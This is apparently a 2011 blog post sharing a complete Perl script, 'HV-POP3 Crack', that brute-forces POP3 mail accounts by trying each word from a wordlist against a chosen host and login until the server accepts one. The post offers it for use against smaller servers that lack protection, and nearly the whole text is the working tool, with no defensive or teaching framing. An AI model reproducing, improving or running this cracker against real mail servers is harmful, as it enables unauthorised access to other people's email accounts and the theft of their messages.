Friday 30 December 2011

POP3 Bruteforcer

This perl script can bruteforcer POP3 servers using a words list and is about 100 lines, it may not work on the big ones (google, yahoo, bing) but smaller server may not have the necessary protection.


system clear;

use Socket; 
$port = 110;
$victima = $ARGV[0];
$login = $ARGV[1];
$archivo = $ARGV[2];
if(@ARGV < 3) { &jeje;exit;}
$linea = " ===============================================================\n";
$mem1 = " Hackers Venezuela http://www.hven.com.ve\n";
$mem2 = " HV-POP3 Crack 07/06/99\n";
$mem3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
open (LISTA,"$archivo");
$count = 0 ;
while ($entrada = <LISTA>){
chop $entrada;
$count++;
@nombres[$count] = $entrada ;
}
close(LISTA);
$total_lista = $count;
$verga = $count;
print $linea;
print $mem1;
print $mem2;
print $mem3;
print $linea;
$mem10 = " Total of Words : $count\n";
$mem11 = " Brute Force Attack ......!\n";
$mem4 = " User : $login\n";
print $mem10;
print $mem11;
print $mem4;
$verga--;
print " Accounts : 1   The Rest : $verga  \n" ;
print $linea;
$contador = 1;
for ($y=0;$y<=$count;$y++){
$pass = @nombres[$y];
$mem9 = "user $login\n";
$mem8 = "pass $pass\n";

$NETFD = &makeconn($victima, $port); 
sysread $NETFD, $message,100 or die "error Can't Read Socket Socket:$!";
send($NETFD,$mem9,0);
sysread $NETFD, $message,100 or die "error Can't Read Socket:$!";
send($NETFD,$mem8,0);
sysread $NETFD, $message,3 or die "error Can't Read Socket:$!";
 if($message eq "+OK"){ &refrescar($count,$y,$login) ; print " Account Cracked  login: $login \n"; print "                 
pass : \"$pass\" :-)\n"; print $linea; exit;}
 if($message eq " +O"){ print " Account not  Cracked login: $login \n"; print "                  pass : \"$pass\" :-)\n"; print
$linea; exit;}
 close $NETFD;
$contador++;
if($contador eq "6"){ $contador = 0; &refrescar($count,$y,$login);}
 }
print " Bad Milk  \"$login\" Account not Cracked!! :-(\n";
print $linea;
sub makeconn { 
my ($host, $portname, $server, $pt,$pts, $proto, $servaddr); 
$host = $_[0]; 
$pt = $_[1];  
$server = gethostbyname($host) or 
die "gethostbyname: cannot locate host: $!";
$pts = getservbyport($pt, 'tcp') or 
die "getservbyname: cannot get port : $!"; 
$proto = getprotobyname('tcp') or die " : $!"; 
$servaddr = sockaddr_in($pt, $server); 
socket(CONNFD, PF_INET, SOCK_STREAM, $proto); 
connect(CONNFD, $servaddr) or die "connect : $!";
return CONNFD; 
 }

sub jeje {
my ($sal1,$sal2,$sal3,$sal4,$sal5);
$sal1 = " Hackers Venezuela http://www.hven.com.ve \n";
$sal2 = " HV-POP3 Crack 07/06/99\n";  
$sal3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
$sal4 = " ===============================================================\n";
$sal5 = " issue : perl hv-pop3 host  login  words_file\n";
print $sal4;
print $sal1;
print $sal2;
print $sal3;
print $sal4;
print $sal5;
print $sal4;
}
sub refrescar {
my ($sal1,$sal2,$sal3,$sal4,$sal5);
system clear;
$sal1 = " Hackers Venezuela http://www.hven.com.ve \n";
$sal2 = " HV-POP3 Crack 07/06/99\n";  
$sal3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
$sal4 = " ===============================================================\n";
$total = $_[0];
$intentos = $_[1];
$account = $_[2];
$restantes = $total - $intentos;
$sal5 = " Words Probed : $intentos  ";
$sal6 = " Less Words  : $restantes \n";
$user = " User : $account\n";
print $sal4;
print $sal1;
print $sal2;
print $sal3;
print $sal4;
print $mem10,$mem11,$user;
print $sal5;
print $sal6;
print $sal4;
}

Download

No comments:

Post a Comment